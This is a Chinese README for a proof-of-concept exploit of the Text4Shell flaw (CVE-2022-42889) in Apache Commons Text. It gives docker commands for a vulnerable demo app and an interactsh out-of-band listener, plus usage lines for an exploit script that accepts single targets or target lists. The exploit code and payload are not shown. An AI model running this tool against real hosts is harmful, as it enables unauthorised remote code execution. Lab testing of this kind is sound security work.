
CVE-2022-42889 - Text4Shell 漏洞利用
这是一个概念验证(PoC),用于利用 Apache Commons Text 中的漏洞 [CVE-2022-42889]
受影响版本:1.5.0 至(不含)1.10.0
成功利用此漏洞,可使未经身份验证的攻击者在易受攻击的资产上执行任意代码
由 @securekomodo 开发的应用程序,附加在 此处。
该应用程序也可以从 docker-registry 加载
docker run -p 8080:8080 gokul2/text4shell-poc:latest
现在该应用程序将在 localhost:8080 上可用。
为了验证任意命令执行,我们使用 interactsh —— 一个由 @projectdiscovery 开发的用于捕获 OOB 交互的工具。
在执行实际漏洞利用之前,请先设置好 interactsh 客户端。
docker run projectdiscovery/interactsh-client:latest
记下应用程序启动后列出的域名
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
检查 interactsh-client 中的日志,以验证漏洞利用是否成功。